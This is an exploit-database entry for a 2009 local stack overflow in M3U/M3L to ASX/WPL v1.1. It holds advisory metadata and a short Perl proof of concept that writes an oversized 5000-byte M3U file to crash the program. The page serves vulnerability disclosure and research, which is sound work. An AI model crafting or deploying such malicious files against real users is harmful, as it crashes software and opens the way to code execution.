M3U/M3L to ASX/WPL v1.1 Local Stack Overflow POC

vendor:

M3U/M3L to ASX/WPL

by:

ThE g0bL!N

9,3

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: M3U/M3L to ASX/WPL

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

M3U/M3L to ASX/WPL v1.1 Local Stack Overflow POC

This exploit is a proof of concept for a stack overflow vulnerability in the M3U/M3L to ASX/WPL v1.1 software. The vulnerability is triggered when a maliciously crafted M3U/M3L file is opened, causing a buffer overflow. This can lead to arbitrary code execution.

Mitigation:

No known mitigation is available for this vulnerability.

Source

Exploit-DB raw data:

 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   M3U/M3L to ASX/WPL v1.1  (asx,m3u,m3l) Local Stack Overflow POC          ##
# #  Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html             ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');#asx,m3u,m3l)
print myfile $crash;
##################################################################################
#By ThE g0bL!N
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]